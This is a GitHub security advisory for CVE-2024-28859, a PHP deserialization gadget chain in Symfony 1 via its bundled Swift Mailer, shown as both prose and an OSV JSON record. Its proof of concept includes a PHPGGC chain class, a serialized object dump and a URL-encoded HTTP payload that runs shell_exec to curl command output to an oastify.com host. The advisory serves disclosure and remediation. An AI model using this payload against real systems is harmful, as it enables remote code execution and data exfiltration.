ghsa-wjv8-pxr6-5f4r
Vulnerability from github
Published
2024-03-18 20:36
Modified
2025-05-15 21:21
Severity ?
5.0 (Medium) - CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:L/I:L/A:L
Summary
Gadget chain in Symfony 1 due to vulnerable Swift Mailer dependency
Details

Summary

Symfony 1 has a gadget chain due to vulnerable Swift Mailer dependency that would enable an attacker to get remote code execution if a developer unserialize user input in his project.

Details

This vulnerability present no direct threat but is a vector that will enable remote code execution if a developper deserialize user untrusted data. For example: php public function executeIndex(sfWebRequest $request) { $a = unserialize($request->getParameter('user')); }

We will make the assumption this is the case in the rest of this explanation.

Symfony 1 depends on Swift Mailer which is bundled by default in vendor directory in the default installation since 1.3.0. Swift Mailer classes implement some __destruct() methods like for instance Swift_KeyCache_DiskKeyCache : php public function __destruct() { foreach ($this->_keys as $nsKey=>$null) { $this->clearAll($nsKey); } }

This method is called when php destroy the object in memory. However, it is possible to include any object type in $this->_keys to make PHP access to another array/object properties than intended by the developer. In particular, it is possible to abuse the array access which is triggered on foreach($this->_keys ...) for any class implementing ArrayAccess interface. sfOutputEscaperArrayDecorator implements such interface. Here is the call made on offsetGet(): php public function offsetGet($offset) { return sfOutputEscaper::escape($this->escapingMethod, $this->value[$offset]); } Which trigger escape() in sfOutputEscaper class with attacker controlled parameters from deserialized object with $this->escapingMethod and $this->value[$offset]: ```php public static function escape($escapingMethod, $value) { if (null === $value) { return $value; }

// Scalars are anything other than arrays, objects and resources.
if (is_scalar($value))
{
  return call_user_func($escapingMethod, $value);
}

`` Which callscall_user_func` with previous attacker controlled input.

However, most recent versions of Swift Mailer are not vulnerable anymore. A fix has been done with commit 5878b18b36c2c119ef0e8cd49c3d73ee94ca0fed to prevent #arbitrary deserialization. This commit has been shipped with version 6.2.5 of Swift Mailer.

Concreetly, __wakeup() have been implemented to clear attributes' values: php public function __wakeup() { $this->keys = []; }

And/or prevent any deserialization: php public function __wakeup() { throw new \BadMethodCallException('Cannot unserialize '.__CLASS__); }

If you install last version 1.5 with composer, you will end-up installing last 6.x version of Swift Mailer containing the previous fixes. Here is an extract of the composer.lock: json { "name": "friendsofsymfony1/symfony1", "version": "v1.5.15", "source": { "type": "git", "url": "https://github.com/FriendsOfSymfony1/symfony1.git", "reference": "9945f3f27cdc5aac36f5e8c60485e5c9d5df86f2" }, "require": { "php": ">=5.3.0", "swiftmailer/swiftmailer": "~5.2 || ^6.0" }, ... { "name": "swiftmailer/swiftmailer", "version": "v6.3.0", ... } }

By reviewing releases archives, composer.json targets vulnerable branch 5.x before Symfony 1.5.13 included: json { "name": "friendsofsymfony1/symfony1", "description": "Fork of symfony 1.4 with dic, form enhancements, latest swiftmailer and better performance", "type": "library", "license": "MIT", "require": { "php" : ">=5.3.0", "swiftmailer/swiftmailer": "~5.2" }, ...

So, the gadget chain is valid for at least versions until 1.5.13.

However, if you install last version of Symfony with git as described in the README, Swift Mailer vendors is referenced through a git sub-module targeting branch 5.x of Swift Mailer: shell [submodule "lib/vendor/swiftmailer"] path = lib/vendor/swiftmailer url = https://github.com/swiftmailer/swiftmailer.git branch = 5.x [submodule "lib/plugins/sfDoctrinePlugin/lib/vendor/doctrine"] path = lib/plugins/sfDoctrinePlugin/lib/vendor/doctrine url = https://github.com/FriendsOfSymfony1/doctrine1.git

And branch 5.x does not have the backport of the fix committed on branch 6.x. Last commit date from Jul 31, 2018.

PoC

So we need the following object to trigger an OS command like shell_exec("curl https://h0iphk4mv3e55nt61wjp9kur9if930vok.oastify.com?a=$(id)");:

php object(Swift_KeyCache_DiskKeyCache)#88 (4) { ["_stream":"Swift_KeyCache_DiskKeyCache":private]=> NULL ["_path":"Swift_KeyCache_DiskKeyCache":private]=> string(25) "thispathshouldneverexists" ["_keys":"Swift_KeyCache_DiskKeyCache":private]=> object(sfOutputEscaperArrayDecorator)#89 (3) { ["count":"sfOutputEscaperArrayDecorator":private]=> NULL ["value":protected]=> array(1) { [1]=> string(66) "curl https://h0iphk4mv3e55nt61wjp9kur9if930vok.oastify.com?a=$(id)" } ["escapingMethod":protected]=> string(10) "shell_exec" } ["_quotes":"Swift_KeyCache_DiskKeyCache":private]=> bool(false) }

We craft a chain with PHPGGC. Please do not publish it as I will make a PR on PHPGGC but I wait for you to fix before: * gadgets.php: ```php class Swift_KeyCache_DiskKeyCache { private $_path; private $_keys = array(); public function __construct($keys, $path) { $this->_keys = $keys; $this->_path = $path; } }

class sfOutputEscaperArrayDecorator { protected $value; protected $escapingMethod; public function __construct($escapingMethod, $value) { $this->escapingMethod = $escapingMethod; $this->value = $value; } } ```

  • chain.php: ```php namespace GadgetChain\Symfony;

class RCE12 extends \PHPGGC\GadgetChain\RCE\FunctionCall { public static $version = '1.3.0 < 1.5.15'; public static $vector = '__destruct'; public static $author = 'darkpills'; public static $information = 'Based on Symfony 1 and Swift mailer in Symfony\'s vendor';

public function generate(array $parameters)
{
    $cacheKey = "1";
    $keys = new \sfOutputEscaperArrayDecorator($parameters['function'], array($cacheKey => $parameters['parameter']));
    $path = "thispathshouldneverexists";
    $cache = new \Swift_KeyCache_DiskKeyCache($keys, $path);

    return $cache;
}

} ```

And trigger the deserialization with an HTTP request like the following on a dummy test controller:

```http POST /frontend_dev.php/test/index HTTP/1.1 Host: localhost:8001 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 532

user=a%3A2%3A%7Bi%3A7%3BO%3A27%3A%22Swift_KeyCache_DiskKeyCache%22%3A2%3A%7Bs%3A34%3A%22%00Swift_KeyCache_DiskKeyCache%00_path%22%3Bs%3A25%3A%22thispathshouldneverexists%22%3Bs%3A34%3A%22%00Swift_KeyCache_DiskKeyCache%00_keys%22%3BO%3A29%3A%22sfOutputEscaperArrayDecorator%22%3A2%3A%7Bs%3A8%3A%22%00%2A%00value%22%3Ba%3A1%3A%7Bi%3A1%3Bs%3A66%3A%22curl+https%3A%2F%2Fh0iphk4mv3e55nt61wjp9kur9if930vok.oastify.com%3Fa%3D%24%28id%29%22%3B%7Ds%3A17%3A%22%00%2A%00escapingMethod%22%3Bs%3A10%3A%22shell_exec%22%3B%7D%7Di%3A7%3Bi%3A7%3B%7D ```

Note that CVSS score is not applicable to this kind of vulnerability.

Impact

The attacker can execute any PHP command which leads to remote code execution.

Recommendation

As with composer, Symfony is already using branch 6.x of Swift mailer there does not seem to be breaking change for Symfony 1 with branch 6.x? Or is it a mistake?

In this case, update submodule reference to version 6.2.5 or higher, after commit 5878b18b36c2c119ef0e8cd49c3d73ee94ca0fed

Or if Symfony 1.5 need Swift 5.x, fork Swift mailer in a FOS/SwiftMailer repository and cherry-pick commit 5878b18b36c2c119ef0e8cd49c3d73ee94ca0fed

Show details on source website

To clipboard 

{
  "affected": [
    {
      "database_specific": {
        "last_known_affected_version_range": "\u003c 1.5.13"
      },
      "package": {
        "ecosystem": "Packagist",
        "name": "friendsofsymfony1/symfony1"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "1.3.0"
            },
            {
              "fixed": "1.5.18"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    },
    {
      "package": {
        "ecosystem": "Packagist",
        "name": "friendsofsymfony1/swiftmailer"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "4.0.0"
            },
            {
              "fixed": "5.4.13"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    },
    {
      "package": {
        "ecosystem": "Packagist",
        "name": "friendsofsymfony1/swiftmailer"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "6.0.0"
            },
            {
              "fixed": "6.2.5"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    },
    {
      "package": {
        "ecosystem": "Packagist",
        "name": "swiftmailer/swiftmailer"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "4.0.0"
            },
            {
              "fixed": "6.2.5"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2024-28859"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-502"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2024-03-18T20:36:06Z",
    "nvd_published_at": "2024-03-15T23:15:08Z",
    "severity": "MODERATE"
  },
  "details": "### Summary\nSymfony 1 has a gadget chain due to vulnerable Swift Mailer dependency that would enable an attacker to get remote code execution if a developer unserialize user input in his project.\n\n### Details\nThis vulnerability present no direct threat but is a vector that will enable remote code execution if a developper deserialize user untrusted data. For example:\n```php\n public function executeIndex(sfWebRequest $request)\n  {\n    $a = unserialize($request-\u003egetParameter(\u0027user\u0027));\n  }\n```\n\nWe will make the assumption this is the case in the rest of this explanation.\n\nSymfony 1 depends on Swift Mailer which is bundled by default in `vendor` directory in the default installation since 1.3.0. Swift Mailer classes implement some `__destruct()` methods like for instance `Swift_KeyCache_DiskKeyCache` :\n```php\n  public function __destruct()\n  {\n    foreach ($this-\u003e_keys as $nsKey=\u003e$null)\n    {\n      $this-\u003eclearAll($nsKey);\n    }\n  }\n```\n\nThis method is called when php destroy the object in memory. However, it is possible to include any object type in `$this-\u003e_keys` to make PHP access to another array/object properties than intended by the developer. In particular, it is possible to abuse the array access which is triggered on `foreach($this-\u003e_keys ...)` for any class implementing `ArrayAccess`  interface. `sfOutputEscaperArrayDecorator`  implements such interface. Here is the call made on `offsetGet()`:\n```php\n  public function offsetGet($offset)\n  {\n    return sfOutputEscaper::escape($this-\u003eescapingMethod, $this-\u003evalue[$offset]);\n  }\n```\nWhich trigger `escape()` in `sfOutputEscaper` class with attacker controlled parameters from deserialized object with `$this-\u003eescapingMethod` and `$this-\u003evalue[$offset]`:\n```php\n  public static function escape($escapingMethod, $value)\n  {\n    if (null === $value)\n    {\n      return $value;\n    }\n\n    // Scalars are anything other than arrays, objects and resources.\n    if (is_scalar($value))\n    {\n      return call_user_func($escapingMethod, $value);\n    }\n```\nWhich calls `call_user_func` with previous attacker controlled input.\n\nHowever, most recent versions of Swift Mailer are not vulnerable anymore. A fix has been done with [commit 5878b18b36c2c119ef0e8cd49c3d73ee94ca0fed](https://github.com/swiftmailer/swiftmailer/commit/5878b18b36c2c119ef0e8cd49c3d73ee94ca0fed) to prevent #arbitrary deserialization. This commit has been shipped with version 6.2.5 of Swift Mailer.\n\nConcreetly, `__wakeup()` have been implemented to clear attributes\u0027 values:\n```php\n  public function __wakeup()\n  {\n      $this-\u003ekeys = [];\n  }\n```\n\nAnd/or prevent any deserialization:\n```php\n  public function __wakeup()\n  {\n      throw new \\BadMethodCallException(\u0027Cannot unserialize \u0027.__CLASS__);\n  }\n```\n\nIf you install last version 1.5 with composer, you will end-up installing last 6.x version of Swift Mailer containing the previous fixes. Here is an extract of the composer.lock:\n```json\n{\n  \"name\": \"friendsofsymfony1/symfony1\",\n  \"version\": \"v1.5.15\",\n  \"source\": {\n      \"type\": \"git\",\n      \"url\": \"https://github.com/FriendsOfSymfony1/symfony1.git\",\n      \"reference\": \"9945f3f27cdc5aac36f5e8c60485e5c9d5df86f2\"\n  },\n  \"require\": {\n      \"php\": \"\u003e=5.3.0\",\n      \"swiftmailer/swiftmailer\": \"~5.2 || ^6.0\"\n  },\n  ...\n  {\n    \"name\": \"swiftmailer/swiftmailer\",\n    \"version\": \"v6.3.0\",\n  ...\n  }\n}\n```\n\nBy reviewing releases archives, `composer.json` targets vulnerable branch 5.x before Symfony 1.5.13 included:\n```json\n{\n    \"name\": \"friendsofsymfony1/symfony1\",\n    \"description\": \"Fork of symfony 1.4 with dic, form enhancements, latest swiftmailer and better performance\",\n    \"type\": \"library\",\n    \"license\": \"MIT\",\n    \"require\": {\n        \"php\" : \"\u003e=5.3.0\",\n        \"swiftmailer/swiftmailer\": \"~5.2\"\n    },\n    ...\n```\n\nSo, the gadget chain is valid for at least versions until 1.5.13.\n\nHowever, if you install last version of Symfony with git as described in the README, Swift Mailer vendors is referenced through a git sub-module targeting branch 5.x of Swift Mailer:\n```shell\n[submodule \"lib/vendor/swiftmailer\"]\n    path = lib/vendor/swiftmailer\n    url = https://github.com/swiftmailer/swiftmailer.git\n    branch = 5.x\n[submodule \"lib/plugins/sfDoctrinePlugin/lib/vendor/doctrine\"]\n    path = lib/plugins/sfDoctrinePlugin/lib/vendor/doctrine\n    url = https://github.com/FriendsOfSymfony1/doctrine1.git\n```\n\nAnd branch 5.x does not have the backport of the fix committed on branch 6.x. Last commit date from Jul 31, 2018.\n\n### PoC\n\nSo we need the following object to trigger an OS command like `shell_exec(\"curl https://h0iphk4mv3e55nt61wjp9kur9if930vok.oastify.com?a=$(id)\");`:\n\n```php\nobject(Swift_KeyCache_DiskKeyCache)#88 (4) {\n  [\"_stream\":\"Swift_KeyCache_DiskKeyCache\":private]=\u003e\n  NULL\n  [\"_path\":\"Swift_KeyCache_DiskKeyCache\":private]=\u003e\n  string(25) \"thispathshouldneverexists\"\n  [\"_keys\":\"Swift_KeyCache_DiskKeyCache\":private]=\u003e\n  object(sfOutputEscaperArrayDecorator)#89 (3) {\n    [\"count\":\"sfOutputEscaperArrayDecorator\":private]=\u003e\n    NULL\n    [\"value\":protected]=\u003e\n    array(1) {\n      [1]=\u003e\n      string(66) \"curl https://h0iphk4mv3e55nt61wjp9kur9if930vok.oastify.com?a=$(id)\"\n    }\n    [\"escapingMethod\":protected]=\u003e\n    string(10) \"shell_exec\"\n  }\n  [\"_quotes\":\"Swift_KeyCache_DiskKeyCache\":private]=\u003e\n  bool(false)\n}\n```\n\nWe craft a chain with PHPGGC. Please do not publish it as I will make a PR on PHPGGC but I wait for you to fix before:\n* gadgets.php:\n```php\nclass Swift_KeyCache_DiskKeyCache\n{\n  private $_path;\n  private $_keys = array();\n  public function __construct($keys, $path) {\n    $this-\u003e_keys = $keys;\n    $this-\u003e_path = $path;\n  }\n}\n\nclass sfOutputEscaperArrayDecorator\n{\n  protected $value;\n  protected $escapingMethod;\n  public function __construct($escapingMethod, $value) {\n    $this-\u003eescapingMethod = $escapingMethod;\n    $this-\u003evalue = $value;\n  }\n}\n```\n\n* chain.php:\n```php\nnamespace GadgetChain\\Symfony;\n\nclass RCE12 extends \\PHPGGC\\GadgetChain\\RCE\\FunctionCall\n{\n    public static $version = \u00271.3.0 \u003c 1.5.15\u0027;\n    public static $vector = \u0027__destruct\u0027;\n    public static $author = \u0027darkpills\u0027;\n    public static $information = \n        \u0027Based on Symfony 1 and Swift mailer in Symfony\\\u0027s vendor\u0027;\n\n    public function generate(array $parameters)\n    {\n        $cacheKey = \"1\";\n        $keys = new \\sfOutputEscaperArrayDecorator($parameters[\u0027function\u0027], array($cacheKey =\u003e $parameters[\u0027parameter\u0027]));\n        $path = \"thispathshouldneverexists\";\n        $cache = new \\Swift_KeyCache_DiskKeyCache($keys, $path);\n\n        return $cache;\n    }\n}\n```\n\nAnd trigger the deserialization with an HTTP request like the following on a dummy test controller:\n\n```http\nPOST /frontend_dev.php/test/index HTTP/1.1\nHost: localhost:8001\nUser-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8\nAccept-Language: en-US,en;q=0.5\nAccept-Encoding: gzip, deflate, br\nConnection: close\nContent-Type: application/x-www-form-urlencoded\nContent-Length: 532\n\nuser=a%3A2%3A%7Bi%3A7%3BO%3A27%3A%22Swift_KeyCache_DiskKeyCache%22%3A2%3A%7Bs%3A34%3A%22%00Swift_KeyCache_DiskKeyCache%00_path%22%3Bs%3A25%3A%22thispathshouldneverexists%22%3Bs%3A34%3A%22%00Swift_KeyCache_DiskKeyCache%00_keys%22%3BO%3A29%3A%22sfOutputEscaperArrayDecorator%22%3A2%3A%7Bs%3A8%3A%22%00%2A%00value%22%3Ba%3A1%3A%7Bi%3A1%3Bs%3A66%3A%22curl+https%3A%2F%2Fh0iphk4mv3e55nt61wjp9kur9if930vok.oastify.com%3Fa%3D%24%28id%29%22%3B%7Ds%3A17%3A%22%00%2A%00escapingMethod%22%3Bs%3A10%3A%22shell_exec%22%3B%7D%7Di%3A7%3Bi%3A7%3B%7D\n```\n\nNote that CVSS score is not applicable to this kind of vulnerability.\n\n### Impact\nThe attacker can execute any PHP command which leads to remote code execution.\n\n### Recommendation\nAs with composer, Symfony is already using branch 6.x of Swift mailer there does not seem to be breaking change for Symfony 1 with branch 6.x? Or is it a mistake?\n\nIn this case, update submodule reference to version 6.2.5 or higher, after commit 5878b18b36c2c119ef0e8cd49c3d73ee94ca0fed\n\nOr if Symfony 1.5 need Swift 5.x, fork Swift mailer in a FOS/SwiftMailer repository and cherry-pick commit 5878b18b36c2c119ef0e8cd49c3d73ee94ca0fed",
  "id": "GHSA-wjv8-pxr6-5f4r",
  "modified": "2025-05-15T21:21:04Z",
  "published": "2024-03-18T20:36:06Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/FriendsOfSymfony1/symfony1/security/advisories/GHSA-wjv8-pxr6-5f4r"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-28859"
    },
    {
      "type": "WEB",
      "url": "https://github.com/FriendsOfSymfony1/symfony1/commit/edb850f94fb4de18ca53d0d1824910d6e8130166"
    },
    {
      "type": "WEB",
      "url": "https://github.com/FriendsOfPHP/security-advisories/blob/master/friendsofsymfony1/swiftmailer/CVE-2024-28859.yaml"
    },
    {
      "type": "WEB",
      "url": "https://github.com/FriendsOfPHP/security-advisories/blob/master/friendsofsymfony1/symfony1/CVE-2024-28859.yaml"
    },
    {
      "type": "WEB",
      "url": "https://github.com/FriendsOfPHP/security-advisories/blob/master/swiftmailer/swiftmailer/CVE-2024-28859.yaml"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/FriendsOfSymfony1/symfony1"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:L/I:L/A:L",
      "type": "CVSS_V3"
    }
  ],
  "summary": "Gadget chain in Symfony 1 due to vulnerable Swift Mailer dependency"
}


Log in or create an account to share your comment.




Tags
Taxonomy of the tags.




Sightings

Author Source Type Date

Nomenclature

  • Seen: The vulnerability was mentioned, discussed, or seen somewhere by the user.
  • Confirmed: The vulnerability is confirmed from an analyst perspective.
  • Published Proof of Concept: A public proof of concept is available for this vulnerability.
  • Exploited: This vulnerability was exploited and seen by the user reporting the sighting.
  • Patched: This vulnerability was successfully patched by the user reporting the sighting.
  • Not exploited: This vulnerability was not exploited or seen by the user reporting the sighting.
  • Not confirmed: The user expresses doubt about the veracity of the vulnerability.
  • Not patched: This vulnerability was not successfully patched by the user reporting the sighting.